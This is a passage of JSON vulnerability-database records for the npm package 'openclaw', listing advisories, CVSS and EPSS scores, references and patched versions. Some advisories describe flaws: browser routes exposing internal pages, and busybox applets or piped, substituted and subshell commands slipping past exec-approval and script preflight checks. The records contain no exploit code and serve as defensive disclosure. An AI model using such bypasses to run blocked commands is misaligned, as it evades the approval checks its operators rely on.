"scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffr4-mrhv-vfr2"}],"fixed_packages":[],"aliases":["GHSA-ffr4-mrhv-vfr2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6rha-8r5p-jyb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89059?format=json","vulnerability_id":"VCID-6wth-qthz-yud8","summary":"OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation\n## Summary\n\nBrowser snapshot and screenshot routes could expose internal page content after navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAuthenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. 
In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages.\n\n## Technical Details\n\nThe fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows.\n\n## Fix\n\nThe issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `b75ad800a59009fc47eaa3471410f69046150e59`\n- PR: #66040\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42436","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09041","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10552","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.1059","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42436"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59","reference_id":"","reference_type":"","scores":
[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66040","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66040"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm
-58hj-j6pj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42436","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42436"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes"},{"reference_url":"https://github.com/advisories/GHSA-c4qm-58hj-j6pj","reference_id":"GHSA-c4qm-58hj-j6pj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c4qm-58hj-j6pj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnera
bility":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-42436","GHSA-c4qm-58hj-j6pj"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6wth-qthz-yud8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89630?format=json","vulnerability_id":"VCID-6y5w-am4s-6qa5","summary":"OpenClaw: busybox and toybox applet execution weakened exec approval binding\n## Summary\n\nbusybox and toybox applet execution weakened exec approval binding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.23 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nOpaque multi-call binaries such as `busybox` and `toybox` could obscure which applet or script-like behavior would actually run, weakening exec approval binding and risk classification.\n\n## Technical 
Details\n\nThe fix treats `busybox` and `toybox` as opaque mutable script runners and fails closed rather than binding unsafe applet invocations.\n\n## Fix\n\nThe issue was fixed in #65713. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `666f48d9b882a8a1415ca53f9567c72499d850c9`\n- PR: #65713\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43530","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19015","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21375","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21421","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43530"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/666f48d9b882a8a1415ca53f9567c72499d850c9"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65713","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65713"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2cq5-mf3v-mx44"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43530","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scori
ng_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43530"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T14:31:04Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-weakened-exec-approval-binding-via-busybox-and-toybox-applet-execution"},{"reference_url":"https://github.com/advisories/GHSA-2cq5-mf3v-mx44","reference_id":"GHSA-2cq5-mf3v-mx44","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cq5-mf3v-mx44"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1
-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43530","GHSA-2cq5-mf3v-mx44"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6y5w-am4s-6qa5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89784?format=json","vulnerability_id":"VCID-733f-57ds-xugm","summary":"Duplicate Advisory: OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-fvx6-pj3r-5q4q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit 8aceaf5 contain a preflight validation bypass vulnerability in shell-bleed protection that allows attackers to execute blocked script content by using piped or complex command forms that the parser fails to recognize. 
Attackers can craft commands such as piped execution, command substitution, or subshell invocation to bypass the validateScriptFileForShellBleed() validation checks and execute arbitrary script content that would otherwise be blocked.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC
:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-rf75-g96h-j3rm","reference_id":"GHSA-rf75-g96h-j3rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rf75-g96h-j3rm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x
3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-m
qff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-rf75-g96h-j3rm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-733f-57ds-xugm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88995?format=json","vulnerability_id":"VCID-73cz-n29z-uqem","summary":"Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. 
Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N